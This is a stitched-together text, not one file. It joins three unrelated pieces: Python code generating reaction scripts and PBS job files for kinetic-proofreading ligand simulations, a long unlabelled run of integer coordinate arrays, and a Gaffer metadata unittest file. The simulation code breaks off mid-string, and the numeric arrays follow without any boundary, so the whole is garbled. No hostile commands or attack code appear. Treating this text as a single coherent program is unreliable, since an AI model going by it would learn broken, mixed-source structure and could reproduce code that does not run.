subprocess.call(["ssc", "--save-expanded=network", "{0}".format(script_name)])
class TwoSpecies(object):
def __init__(self):
self.k_AB = 0.1
self.k_BA = 0.2
self.species = {"A": [self.k_AB, "B"], "B": [self.k_BA, "A"]}
self.n_initial = {"A": 800, "B": 200}
self.record = ["A", "B"]
self.script_name = "two_species_A_B.rxn"
self.shared = SharedCommands(self.n_initial, self.record)
self.regions = DefineRegion()
self.simulation_name = "two_species_A_B"
self.num_files = 50
self.run_time = 100
self.time_step = 0.1
def define_rxns(self, f):
for key, value in self.species.items():
f.write("rxn x:{0} at {1} -> destroy x; new {2}\n".format(key, value[0], value[1]))
f.write("\n")
def generate_script(self):
f = open(self.script_name, "w")
self.regions.define_region(f)
self.define_rxns(f)
self.shared.initialize(f)
self.shared.record_species(f)
f.close()
def generate_qsub(self):
q = open("qsub.sh", "w")
q.write("#PBS -m ae\n")
q.write("#PBS -q short\n")
q.write("#PBS -V\n")
q.write("#PBS -l walltime=00:02:00,nodes=1:ppn=1 -N {0}\n\n".format(self.simulation_name))
q.write("cd $PBS_O_WORKDIR\n\n")
q.write("EXE_FILE={0}\n".format(self.simulation_name))
q.write("RUN_TIME={0}\n".format(self.run_time))
q.write("STEP={0}\n\n".format(self.time_step))
q.write("for j in {1.." + str(self.num_files) + "}\n")
q.write("do\n")
q.write("\t ./$EXE_FILE -e $RUN_TIME -t $STEP > traj_$j\n")
q.write("done\n")
q.write("wait \n")
q.write("python ~/SSC_python_modules/post_process.py --run_time $RUN_TIME --time_step $STEP\n")
class TwoWay(object):
def __init__(self):
self.dictionary = {}
def add(self, key, value):
self.dictionary[key] = value
self.dictionary[value] = key
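# Minimal usage sketch for TwoWay (illustrative only, not in the original
# file): a single add() call makes the pair resolvable in both directions.
def _two_way_usage_sketch():
    mapping = TwoWay()
    mapping.add("A", "B")
    assert mapping.dictionary["A"] == "B"
    assert mapping.dictionary["B"] == "A"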
class KPBindingParameters(object):
def __init__(self):
self.k_tcr_on = 0.0052
self.k_foreign_off = 0.2
self.k_self_off = 10.0 * self.k_foreign_off
self.k_p = 0.05
self.k_p_off_foreign = 0.5
self.k_p_off_self = 10.0 * self.k_p_off_foreign
class SelfWithForeign(object):
def __init__(self, arguments=None):
self.arguments = arguments
self.rate_constants = KPBindingParameters()
self.n_initial = {"R": 10000, "Lf": 20, "Ls": 0}
self.record = ["Lf", "Ls", "C0", "D0"]
self.simulation_name = "kp_competing"
self.forward_rates = {"RLf": self.rate_constants.k_tcr_on, "RLs": self.rate_constants.k_tcr_on}
self.reverse_rates = {"C0": self.rate_constants.k_foreign_off, "D0": self.rate_constants.k_self_off}
self.forward_rxns = [[["R", "Lf"], ["C0"]], [["R", "Ls"], ["D0"]]]
self.reverse_rxns = [[["C0"], ["R", "Lf"]], [["D0"], ["R", "Ls"]]]
self.num_kp_steps = 1
self.num_samples = 0
if self.arguments:
if self.arguments.test or self.arguments.ss:
self.num_samples = 1
else:
self.num_samples = 1000
self.mu = 6
self.sigma = 1.0
self.p_ligand = [int(i) for i in np.round(np.random.lognormal(self.mu, self.sigma, self.num_samples))]
self.output = ["C", "D"]
def change_ligand_concentration(self, concentration):
self.n_initial["Ls"] = concentration
def modify_forward_reverse(self, reactants, products, forward_rate, reverse_rate):
self.forward_rates[''.join(reactants)] = forward_rate
self.forward_rxns.append([reactants, products])
self.reverse_rates[''.join(products)] = reverse_rate
self.reverse_rxns.append([products, reactants])
self.record.append(''.join(products))
def increment_step(self):
self.num_kp_steps += 1
self.simulation_name = "kp_steps_" + str(self.num_kp_steps)
print("Num KP steps = " + str(self.num_kp_steps))
def add_step_1(self):
self.increment_step()
for i in self.output:
if i == "C":
k_p_off = self.rate_constants.k_p_off_foreign
elif i == "D":
k_p_off = self.rate_constants.k_p_off_self
self.modify_forward_reverse([i + "0"], [i + "1"], self.rate_constants.k_p, k_p_off)
def add_step_2(self):
self.increment_step()
for i in self.output:
if i == "C":
k_p_off = self.rate_constants.k_p_off_foreign
elif i == "D":
k_p_off = self.rate_constants.k_p_off_self
self.modify_forward_reverse([i + "1"], [i + "2"], self.rate_constants.k_p, k_p_off)
def add_step_3(self):
self.increment_step()
for i in self.output:
if i == "C":
k_p_off = self.rate_constants.k_p_off_foreign
elif i == "D":
k_p_off = self.rate_constants.k_p_off_self
self.modify_forward_reverse([i + "2"], [i + "3"], self.rate_constants.k_p, k_p_off)
class ReversibleSelfLigand(SelfWithForeign):
def __init__(self):
SelfWithForeign.__init__(self)
del self.n_initial['Lf']
self.n_initial = {"R": 10000, "Ls": 0}
self.record = ["Ls", "D0"]
self.simulation_name = "kp_ls"
self.forward_rates = {"RLs": self.rate_constants.k_tcr_on}
self.reverse_rates = {"D0": self.rate_constants.k_self_off}
self.forward_rxns = [[["R", "Ls"], ["D0"]]]
self.reverse_rxns = [[["D0"], ["R", "Ls"]]]
self.output = ["D"]
class ForeignLigand(object):
def __init__(self, arguments=None):
self.arguments = arguments
self.rate_constants = KPBindingParameters()
self.inputs = ["R", "Lf"]
self.n_initial = {"R": 10000, "Lf": 0}
self.record = ["Lf", "C0"]
self.simulation_name = "kp_lf"
self.forward_rates = {"RLf": self.rate_constants.k_tcr_on}
self.reverse_rates = {"C0": self.rate_constants.k_foreign_off}
self.forward_rxns = [[["R", "Lf"], ["C0"]]]
self.reverse_rxns = [[["C0"], ["R", "Lf"]]]
self.symbol = "C"
self.num_kp_steps = 1
self.num_samples = 0
if self.arguments:
if self.arguments.test or self.arguments.ss:
self.num_samples = 5
else:
self.num_samples = 1000
self.mu = 20
self.sigma = 0.5
self.p_ligand = [int(i) for i in np.round(np.random.normal(self.mu, self.sigma, self.num_samples))]
def change_ligand_concentration(self, concentration):
self.n_initial["Lf"] = concentration
class SelfLigand(object):
def __init__(self, arguments=None):
self.arguments = arguments
self.rate_constants = KPBindingParameters()
self.inputs = ["R", "Ls"]
self.n_initial = {"R": 10000, "Ls": 0}
self.record = ["Ls", "D0"]
self.simulation_name = "kp_ls"
self.forward_rates = {"RLs": self.rate_constants.k_tcr_on}
self.reverse_rates = {"D0": self.rate_constants.k_self_off}
self.forward_rxns = [[["R", "Ls"], ["D0"]]]
self.reverse_rxns = [[["D0"], ["R", "Ls"]]]
self.symbol = "D"
self.num_kp_steps = 1
if self.arguments:
if self.arguments.test or self.arguments.ss:
self.num_samples = 5
else:
self.num_samples = 1000
self.mu = 6
self.sigma = 1.0
self.p_ligand = [int(i) for i in np.round(np.random.lognormal(self.mu, self.sigma, self.num_samples))]
def change_ligand_concentration(self, concentration):
self.n_initial["Ls"] = concentration
def add_to_network(n, reactants, products, rate):
n.write(" + ".join(reactants))
n.write(" -> {0} ".format(rate))
n.write(" + ".join(products))
n.write("\n")
class KPSingleSpecies(object):
def __init__(self, foreign=False, self_foreign=False, arguments=None):
self.foreign_flag = foreign
self.self_foreign_flag = self_foreign
self.arguments = arguments
self.regions = DefineRegion()
if self.foreign_flag:
self.ligand = ForeignLigand()
elif self.self_foreign_flag:
self.ligand = SelfWithForeign()
else:
self.ligand = ReversibleSelfLigand()
self.num_files = 100
self.run_time = 100
self.simulation_time = 2
self.single_molecule = False
self.home_directory = os.getcwd()
self.num_kp_steps = 1
def set_simulation_time(self, ls=500):
if ls < 500:
simulation_time = 4.0
else:
simulation_time = self.run_time * (20.0 / 1000)
return simulation_time
def set_time_step(self):
if self.arguments:
if self.arguments.ss:
time_step = 1.0
else:
time_step = self.run_time
else:
time_step = self.run_time
return time_step
@staticmethod
def define_reactions(f, rxn, rate, n):
for i in range(len(rxn)):
input_string = "rxn "
destroy_string = ""
input = rxn[i][0]
output = rxn[i][1]
rate_key = ""
for item in input:
input_string += "{0}:{1} ".format(item.lower(), item)
destroy_string += "destroy {0}; ".format(item.lower())
rate_key += item
rate_key += "_"
output_string = ""
for item in output:
output_string += "new {0}; ".format(item)
rate_key += item
rate_string = "at {0} -> ".format(rate[rate_key])
f.write(input_string + rate_string + destroy_string + output_string + "\n")
add_to_network(n, input, output, rate[rate_key])
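    # For reference (illustrative, assuming the rate lookup resolves): for the
    # forward reaction [["R", "Lf"], ["C0"]] at rate 0.0052 the loop above
    # writes a line of the form
    #     rxn r:R lf:Lf at 0.0052 -> destroy r; destroy lf; new C0;
    # into the .rxn script, and records the same reaction in "ordered_network".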
def generate_ssc_script(self, simulation_name):
script_name = simulation_name + ".rxn"
shared = SharedCommands(self.ligand.n_initial, self.ligand.record)
f = open(script_name, "w")
n = open("ordered_network", "w")
self.regions.define_region(f)
f.write("-- Forward reactions \n")
n.write("# Forward Reactions \n")
self.define_reactions(f, self.ligand.forward_rxns, self.ligand.forward_rates, n)
n.write("\n# Reverse Reactions \n")
f.write("\n-- Reverse reactions \n")
self.define_reactions(f, self.ligand.reverse_rxns, self.ligand.reverse_rates, n)
f.write("\n")
shared.initialize(f)
f.write("\n")
shared.record_species(f)
n.close()
f.close()
def generate_qsub(self, simulation_name, time_step, ls=500):
q = open("qsub.sh", "w")
q.write("#PBS -m ae\n")
q.write("#PBS -q short\n")
q.write("#PBS -V\n")
q.write("#PBS -l walltime={1},nodes=1:ppn=1 -N {0}\n\n".format(simulation_name,
datetime.timedelta(
minutes=self.set_simulation_time(ls=ls))))
q.write("cd $PBS_O_WORKDIR\n\n")
q.write("echo $PBS_JOBID > job_id\n")
q.write("EXE_FILE={0}\n".format(simulation_name))
q.write("RUN_TIME={0}\n".format(self.run_time))
q.write("STEP={0}\n\n".format(time_step))
q.write("for j in {1.." + str(self.num_files) + "}\n")
q.write("do\n")
if time_step == self.run_time:
q.write("\t ./$EXE_FILE -e $RUN_TIME > traj_$j\n")
else:
q.write("\t ./$EXE_FILE -e $RUN_TIME -t $STEP > traj_$j\n")
q.write("done\n\n")
q.write("python ~/SSC_python_modules/post_process.py --num_files {0} "
"--run_time $RUN_TIME --time_step $STEP\n".format(self.num_files))
if self.single_molecule:
q.write("wait \n")
q.write("python ~/SSC_python_modules/kp_sm_post_process.py \n")
        if self.arguments and self.arguments.ss:
q.write("python ~/SSC_python_modules/plot.py \n")
q.close()
def generate(self, simulation_name, time_step, ls=500):
self.generate_ssc_script(simulation_name)
compile_script(simulation_name + ".rxn")
self.generate_qsub(simulation_name, time_step, ls=ls)
def single_add_step(self):
self.num_kp_steps += 1
self.ligand.simulation_name = "kp_steps_" + str(self.num_kp_steps)
print("Num KP steps = " + str(self.num_kp_steps))
self.ligand.forward_rates[
self.ligand.symbol + "{0}".format(self.num_kp_steps - 2)] = self.ligand.rate_constants.k_p
self.ligand.forward_rxns.append([[self.ligand.symbol + "{0}".format(self.num_kp_steps - 2)],
[self.ligand.symbol + "{0}".format(self.num_kp_steps - 1)]])
self.ligand.reverse_rates[self.ligand.symbol + "{0}".format(self.num_kp_steps - 1)] = self.ligand.reverse_rates[
self.ligand.symbol + "0"]
self.ligand.reverse_rxns.append(
[[self.ligand.symbol + "{0}".format(self.num_kp_steps - 1)], self.ligand.inputs])
self.ligand.record.append(self.ligand.symbol + "{0}".format(self.num_kp_steps - 1))
def competing_add_step(self):
self.num_kp_steps += 1
self.ligand.simulation_name = "kp_steps_" + str(self.num_kp_steps)
print("Num KP steps = " + str(self.num_kp_steps))
for i in ["C", "D"]:
self.ligand.forward_rates[i + "{0}".format(self.num_kp_steps - 2)] = self.ligand.rate_constants.k_p
self.ligand.forward_rxns.append([[i + "{0}".format(self.num_kp_steps - 2)],
[i + "{0}".format(self.num_kp_steps - 1)]])
if i == "C":
self.ligand.reverse_rates[
i + "{0}".format(self.num_kp_steps - 1)] = self.ligand.rate_constants.k_foreign_off
self.ligand.reverse_rxns.append([[i + "{0}".format(self.num_kp_steps - 1)], ["R", "Lf"]])
elif i == "D":
self.ligand.reverse_rates[
i + "{0}".format(self.num_kp_steps - 1)] = self.ligand.rate_constants.k_self_off
self.ligand.reverse_rxns.append([[i + "{0}".format(self.num_kp_steps - 1)], ["R", "Ls"]])
self.ligand.record.append(i + "{0}".format(self.num_kp_steps - 1))
def add_step(self):
if self.self_foreign_flag:
self.competing_add_step()
else:
self.single_add_step()
def main_script(self, run=False):
sample = []
for i in range(self.ligand.num_samples):
directory = "sample_" + str(i)
s = self.ligand.p_ligand[i]
sample.append(s)
self.ligand.change_ligand_concentration(s)
simulation_name = self.ligand.simulation_name + "_" + str(i)
os.makedirs(directory)
print("Made " + directory)
os.chdir(directory)
print("Changed into directory: " + str(os.getcwd()))
if self.ligand.num_kp_steps > 6:
self.run_time = 1000
self.generate(simulation_name, self.set_time_step())
if run:
(stdout, stderr) = subprocess.Popen(["qsub {0}".format("qsub.sh")], shell=True, stdout=subprocess.PIPE,
cwd=os.getcwd()).communicate()
os.chdir(self.home_directory)
np.savetxt("Ligand_concentrations", sample, fmt='%f')
np.savetxt("Ligand_concentrations_sorted", np.sort(sample), fmt='%f')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Submitting job for calculating P(C0) as function of steps",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--run', action='store_true', default=False,
help='Flag for submitting simulations.')
parser.add_argument('--test', action='store_true', default=False,
help="flag for testing.")
parser.add_argument('--ss', action='store_true', default=False,
help="flag for checking if sims approach steady-state.")
args = parser.parse_args()
two_species = TwoSpecies()
two_species.generate_script()
compile_script(two_species.script_name)
two_species.generate_qsub()
# if "Ls_Lf" in os.getcwd():
# kp = KPSingleSpecies(self_foreign=True, arguments=args)
# elif "Lf" in os.getcwd():
# kp = KPSingleSpecies(foreign=True, arguments=args)
# elif "Ls" in os.getcwd():
# kp = KPSingleSpecies()
# else:
# raise Exception("Incorrect Directory labeling. Specify (Ls, | |
],
[
708,
676,
73,
708,
676,
29,
708,
676,
-3,
728,
552,
48,
721,
409,
24,
689,
405,
7,
656,
402,
22,
634,
539,
47,
556,
662,
-6,
556,
662,
21,
556,
662,
51,
693,
305,
18,
697,
204,
43,
701,
104,
62,
638,
194,
16,
559,
277,
4,
558,
308,
-7,
558,
308,
-21,
757,
213,
26,
757,
313,
34,
726,
380,
37,
726,
380,
29,
697,
204,
86
],
[
708,
677,
73,
708,
677,
29,
708,
677,
-3,
720,
549,
48,
710,
402,
24,
677,
400,
7,
644,
397,
22,
635,
552,
47,
555,
664,
-6,
555,
664,
21,
555,
664,
51,
690,
300,
18,
703,
200,
43,
716,
101,
62,
643,
188,
16,
554,
253,
4,
459,
207,
-7,
459,
207,
-21,
762,
213,
26,
746,
311,
34,
721,
339,
37,
721,
339,
29,
703,
200,
86
],
[
707,
652,
73,
707,
652,
29,
707,
652,
-3,
700,
519,
48,
711,
389,
24,
676,
385,
7,
641,
381,
22,
615,
522,
47,
538,
645,
-6,
538,
645,
21,
538,
645,
51,
685,
282,
18,
694,
179,
43,
703,
79,
62,
640,
169,
16,
561,
206,
4,
526,
178,
-7,
526,
178,
-21,
748,
190,
26,
751,
282,
34,
702,
258,
37,
702,
258,
29,
694,
179,
86
],
[
705,
647,
73,
705,
647,
29,
705,
647,
-3,
699,
518,
48,
702,
382,
24,
667,
378,
7,
633,
373,
22,
592,
512,
47,
522,
644,
-6,
522,
644,
21,
522,
644,
51,
674,
271,
18,
680,
163,
43,
686,
63,
62,
618,
153,
16,
537,
216,
4,
487,
134,
-7,
487,
134,
-21,
741,
174,
26,
748,
275,
34,
691,
212,
37,
691,
212,
29,
680,
163,
86
],
[
703,
649,
73,
703,
649,
29,
703,
649,
-3,
696,
506,
48,
687,
360,
24,
658,
358,
7,
628,
355,
22,
568,
505,
47,
536,
663,
-6,
536,
663,
21,
536,
663,
51,
665,
254,
18,
671,
150,
43,
677,
50,
62,
617,
143,
16,
546,
175,
4,
493,
118,
-7,
493,
118,
-21,
725,
157,
26,
744,
264,
34,
704,
271,
37,
704,
271,
29,
671,
150,
86
],
[
710,
657,
73,
710,
657,
29,
710,
657,
-3,
700,
516,
48,
682,
362,
24,
652,
362,
7,
621,
361,
22,
572,
516,
47,
535,
660,
-6,
535,
660,
21,
535,
660,
51,
662,
256,
18,
671,
150,
43,
680,
50,
62,
624,
148,
16,
553,
182,
4,
491,
116,
-7,
491,
116,
-21,
718,
153,
26,
729,
256,
34,
695,
268,
37,
695,
268,
29,
671,
150,
86
],
[
716,
674,
73,
716,
674,
29,
716,
674,
-3,
728,
527,
48,
703,
374,
24,
667,
374,
7,
632,
374,
22,
587,
519,
47,
535,
672,
-6,
535,
672,
21,
535,
672,
51,
663,
266,
18,
659,
157,
43,
655,
57,
62,
614,
152,
16,
552,
173,
4,
504,
109,
-7,
504,
109,
-21,
705,
162,
26,
723,
258,
34,
719,
302,
37,
719,
302,
29,
659,
157,
86
],
[
713,
674,
73,
713,
674,
29,
713,
674,
-3,
725,
533,
48,
702,
382,
24,
666,
381,
7,
630,
380,
22,
590,
532,
47,
533,
681,
-6,
533,
681,
21,
533,
681,
51,
661,
272,
18,
656,
162,
43,
651,
62,
62,
605,
155,
16,
521,
184,
4,
470,
114,
-7,
470,
114,
-21,
708,
168,
26,
732,
265,
34,
734,
325,
37,
734,
325,
29,
656,
162,
86
],
[
715,
679,
73,
715,
679,
29,
715,
679,
-3,
715,
540,
48,
683,
385,
24,
648,
383,
7,
612,
380,
22,
583,
523,
47,
548,
659,
-6,
548,
659,
21,
548,
659,
51,
653,
274,
18,
657,
164,
43,
661,
64,
62,
602,
153,
16,
480,
203,
4,
444,
121,
-7,
444,
121,
-21,
712,
175,
26,
724,
281,
34,
710,
335,
37,
710,
335,
29,
657,
164,
86
],
[
727,
659,
73,
727,
659,
29,
727,
659,
-3,
700,
507,
48,
666,
371,
24,
629,
369,
7,
591,
367,
22,
573,
501,
47,
552,
634,
-6,
552,
634,
21,
552,
634,
51,
641,
268,
18,
652,
167,
43,
663,
68,
62,
602,
155,
16,
493,
225,
4,
400,
181,
-7,
400,
181,
-21,
702,
179,
26,
705,
295,
34,
708,
392,
37,
708,
392,
29,
652,
167,
86
],
[
665,
680,
73,
665,
680,
29,
665,
680,
-3,
643,
526,
48,
645,
372,
24,
610,
371,
7,
574,
369,
22,
552,
523,
47,
560,
678,
-6,
560,
678,
21,
560,
678,
51,
621,
276,
18,
632,
181,
43,
644,
82,
62,
571,
175,
16,
521,
262,
4,
468,
268,
-7,
468,
268,
-21,
694,
187,
26,
724,
293,
34,
741,
382,
37,
741,
382,
29,
632,
181,
86
],
[
677,
659,
73,
677,
659,
29,
677,
659,
-3,
623,
529,
48,
645,
379,
24,
608,
379,
7,
571,
378,
22,
544,
523,
47,
558,
660,
-6,
558,
660,
21,
558,
660,
51,
615,
283,
18,
622,
186,
43,
629,
86,
62,
560,
183,
16,
521,
275,
4,
489,
284,
-7,
489,
284,
-21,
685,
190,
26,
733,
295,
34,
754,
376,
37,
754,
376,
29,
622,
186,
86
],
[
708,
654,
73,
708,
654,
29,
708,
654,
-3,
627,
532,
48,
648,
397,
24,
608,
391,
7,
567,
386,
22,
530,
532,
47,
549,
664,
-6,
549,
664,
21,
549,
664,
51,
609,
287,
18,
610,
183,
43,
611,
83,
62,
543,
186,
16,
521,
279,
4,
533,
307,
-7,
533,
307,
-21,
678,
179,
26,
762,
270,
34,
837,
299,
37,
837,
299,
29,
610,
183,
86
],
[
708,
654,
73,
708,
654,
29,
708,
654,
-3,
627,
532,
48,
648,
397,
24,
608,
391,
7,
567,
386,
22,
530,
532,
47,
549,
664,
-6,
549,
664,
21,
549,
664,
51,
609,
287,
18,
610,
183,
43,
611,
83,
62,
543,
186,
16,
521,
279,
4,
533,
307,
-7,
533,
307,
-21,
678,
179,
26,
762,
270,
34,
837,
299,
37,
837,
299,
29,
610,
183,
86
],
[
714,
646,
73,
714,
646,
29,
714,
646,
-3,
667,
509,
48,
655,
355,
24,
610,
353,
7,
565,
350,
22,
548,
511,
47,
549,
667,
-6,
549,
667,
21,
549,
667,
51,
614,
252,
18,
617,
150,
43,
620,
50,
62,
557,
151,
16,
538,
237,
4,
605,
199,
-7,
605,
199,
-21,
676,
150,
26,
732,
184,
34,
796,
133,
37,
796,
133,
29,
617,
150,
86
],
[
715,
645,
73,
715,
645,
29,
715,
645,
-3,
668,
506,
48,
656,
353,
24,
611,
351,
7,
566,
349,
22,
548,
508,
47,
548,
666,
-6,
548,
666,
21,
548,
666,
51,
614,
251,
18,
616,
151,
43,
618,
51,
62,
557,
151,
16,
539,
239,
4,
566,
186,
-7,
566,
186,
-21,
675,
150,
26,
733,
184,
34,
798,
134,
37,
798,
134,
29,
616,
151,
86
],
[
716,
637,
73,
716,
637,
29,
716,
637,
-3,
680,
497,
48,
654,
362,
24,
610,
360,
7,
566,
359,
22,
552,
522,
47,
541,
665,
-6,
541,
665,
21,
541,
665,
51,
615,
259,
18,
619,
158,
43,
623,
58,
62,
573,
160,
16,
550,
232,
4,
608,
197,
-7,
608,
197,
-21,
665,
156,
26,
704,
201,
34,
739,
131,
37,
739,
131,
29,
619,
158,
86
],
[
690,
657,
73,
690,
657,
29,
690,
657,
-3,
686,
510,
48,
665,
380,
24,
619,
378,
7,
573,
376,
22,
561,
535,
47,
543,
677,
-6,
543,
677,
21,
543,
677,
51,
632,
268,
18,
645,
158,
43,
657,
59,
62,
591,
164,
16,
563,
238,
4,
609,
168,
-7,
609,
168,
-21,
698,
152,
26,
750,
194,
34,
821,
136,
37,
821,
136,
29,
645,
158,
86
],
[
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import Gaffer
import GafferTest
class MetadataTest( GafferTest.TestCase ) :
class DerivedAddNode( GafferTest.AddNode ) :
def __init__( self, name="DerivedAddNode" ) :
GafferTest.AddNode.__init__( self, name )
IECore.registerRunTimeTyped( DerivedAddNode )
def testNodeDescription( self ) :
add = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "" )
Gaffer.Metadata.registerNodeDescription( GafferTest.AddNode, "description" )
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "description" )
Gaffer.Metadata.registerNodeDescription( GafferTest.AddNode, lambda node : node.getName() )
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "AddNode" )
derivedAdd = self.DerivedAddNode()
self.assertEqual( Gaffer.Metadata.nodeDescription( derivedAdd ), "DerivedAddNode" )
self.assertEqual( Gaffer.Metadata.nodeDescription( derivedAdd, inherit=False ), "" )
Gaffer.Metadata.registerNodeDescription( self.DerivedAddNode.staticTypeId(), "a not very helpful description" )
self.assertEqual( Gaffer.Metadata.nodeDescription( derivedAdd ), "a not very helpful description" )
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "AddNode" )
def testExtendedNodeDescription( self ) :
multiply = GafferTest.MultiplyNode()
self.assertEqual( Gaffer.Metadata.nodeDescription( multiply ), "" )
Gaffer.Metadata.registerNodeDescription(
GafferTest.MultiplyNode,
"description",
"op1",
"op1 description",
"op2",
{
"description" : "op2 description",
"otherValue" : 100,
}
)
self.assertEqual( Gaffer.Metadata.nodeDescription( multiply ), "description" )
self.assertEqual( Gaffer.Metadata.plugDescription( multiply["op1"] ), "op1 description" )
self.assertEqual( Gaffer.Metadata.plugDescription( multiply["op2"] ), "op2 description" )
self.assertEqual( Gaffer.Metadata.plugValue( multiply["op2"], "otherValue" ), 100 )
def testPlugDescription( self ) :
add = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "" )
Gaffer.Metadata.registerPlugDescription( GafferTest.AddNode.staticTypeId(), "op1", "The first operand" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "The first operand" )
Gaffer.Metadata.registerPlugDescription( GafferTest.AddNode.staticTypeId(), "op1", lambda plug : plug.getName() + " description" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "op1 description" )
derivedAdd = self.DerivedAddNode()
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op1"] ), "op1 description" )
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op1"], inherit=False ), "" )
Gaffer.Metadata.registerPlugDescription( self.DerivedAddNode, "op*", "derived class description" )
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op1"] ), "derived class description" )
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op2"] ), "derived class description" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "op1 description" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op2"] ), "" )
def testArbitraryValues( self ) :
add = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( add, "aKey" ), None )
self.assertEqual( Gaffer.Metadata.plugValue( add["op1"], "aKey" ), None )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "aKey", "something" )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op*", "aKey", "somethingElse" )
self.assertEqual( Gaffer.Metadata.nodeValue( add, "aKey" ), "something" )
self.assertEqual( Gaffer.Metadata.plugValue( add["op1"], "aKey" ), "somethingElse" )
def testInheritance( self ) :
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "iKey", "Base class value" )
derivedAdd = self.DerivedAddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( derivedAdd, "iKey" ), "Base class value" )
self.assertEqual( Gaffer.Metadata.nodeValue( derivedAdd, "iKey", inherit=False ), None )
Gaffer.Metadata.registerNodeValue( self.DerivedAddNode, "iKey", "Derived class value" )
self.assertEqual( Gaffer.Metadata.nodeValue( derivedAdd, "iKey", inherit=False ), "Derived class value" )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "iKey", "Base class plug value" )
self.assertEqual( Gaffer.Metadata.plugValue( derivedAdd["op1"], "iKey" ), "Base class plug value" )
self.assertEqual( Gaffer.Metadata.plugValue( derivedAdd["op1"], "iKey", inherit=False ), None )
Gaffer.Metadata.registerPlugValue( self.DerivedAddNode, "op1", "iKey", "Derived class plug value" )
self.assertEqual( Gaffer.Metadata.plugValue( derivedAdd["op1"], "iKey", inherit=False ), "Derived class plug value" )
def testNodeSignals( self ) :
ns = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
ps = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "k", "something" )
self.assertEqual( len( ps ), 0 )
self.assertEqual( len( ns ), 1 )
self.assertEqual( ns[0], ( GafferTest.AddNode.staticTypeId(), "k" ) )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "k", "somethingElse" )
self.assertEqual( len( ps ), 0 )
self.assertEqual( len( ns ), 2 )
self.assertEqual( ns[1], ( GafferTest.AddNode.staticTypeId(), "k" ) )
def testPlugSignals( self ) :
ns = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
ps = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "k", "something" )
self.assertEqual( len( ps ), 1 )
self.assertEqual( len( ns ), 0 )
self.assertEqual( ps[0], ( GafferTest.AddNode.staticTypeId(), "op1", "k" ) )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "k", "somethingElse" )
self.assertEqual( len( ps ), 2 )
self.assertEqual( len( ns ), 0 )
self.assertEqual( ps[1], ( GafferTest.AddNode.staticTypeId(), "op1", "k" ) )
def testSignalsDontExposeInternedStrings( self ) :
cs = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "k", "aaa" )
self.assertTrue( type( cs[0][1] ) is str )
cs = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "k", "bbb" )
self.assertTrue( type( cs[0][1] ) is str )
self.assertTrue( type( cs[0][2] ) is str )
def testInstanceMetadata( self ) :
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode.staticTypeId(), "imt", "globalNodeValue" )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode.staticTypeId(), "op1", "imt", "globalPlugValue" )
n = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( n, "imt" ), "globalNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( n["op1"], "imt" ), "globalPlugValue" )
